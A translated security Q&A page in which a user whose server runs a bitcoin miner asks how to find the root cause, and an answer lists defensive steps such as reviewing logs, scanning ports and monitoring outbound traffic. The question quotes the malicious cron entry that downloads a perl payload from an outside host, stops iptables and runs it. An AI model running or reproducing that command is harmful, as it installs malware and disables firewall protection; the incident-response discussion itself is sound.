首页
学习
活动
专区
圈层
工具
发布
社区首页 >问答首页 >我的服务器被黑了,我只需要找到cronjob命令。

我的服务器被黑了,我只需要找到cronjob命令。
EN

Security用户
提问于 2017-01-09 11:17:08
回答 1查看 1.3K关注 0票数 1

我安装了Clamav和rootkits探测器,他们什么也没发现。

病毒运行了一些进程,名为模块,吃cpu,我的服务器供应商告诉我,这是比特币矿工病毒,但他们没有给我任何其他信息。我发现的唯一一件事就是这个职位:

代码语言:javascript
复制
*      *       *       *       *       curl -o /tmp/.selfish http://royaltyhomeins.com/.god;/sbin/service iptables stop;wget -O /tmp/.selfish http://royaltyhomeins.com/.god;killall -9 perl;killall -9 packet;perl /tmp/.selfish;rm -rf /tmp/.selfish

我把所有的过程都杀了,把那件事去掉了。/tmp文件夹为空。问题是我没有找到核心的“问题”。我还能做什么?

EN

回答 1

Security用户

发布于 2017-01-09 11:41:26

从您所说的,很难判断服务器是通过您的web应用程序/站点,还是通过一些过时的软件或其他方式被入侵的,但是有些事情您可以尝试:

  • 检查apache/nginx日志并尝试查找可疑请求。
  • 检查服务器软件的版本(web服务器、perl、php.)寻找过时的版本。
  • 使用nmap进行端口扫描,查找打开但不应该打开的端口。
  • 使用nikto或其他webapp安全扫描仪进行快速扫描。如果您正在使用wordpress,请尝试wpscan。
  • 继续监视出站连接并查找可疑活动。
  • 更改密码。
  • 问/付钱给别人来评估你的网络应用程序的安全性。

但基本上只有日志文件才能找出根本原因。其他方法可以识别漏洞,但在这种情况下无法判断攻击者是否使用了这些漏洞。

票数 2
EN
页面原文内容由Security提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://security.stackexchange.com/questions/147752

复制
相关文章

相似问题

领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档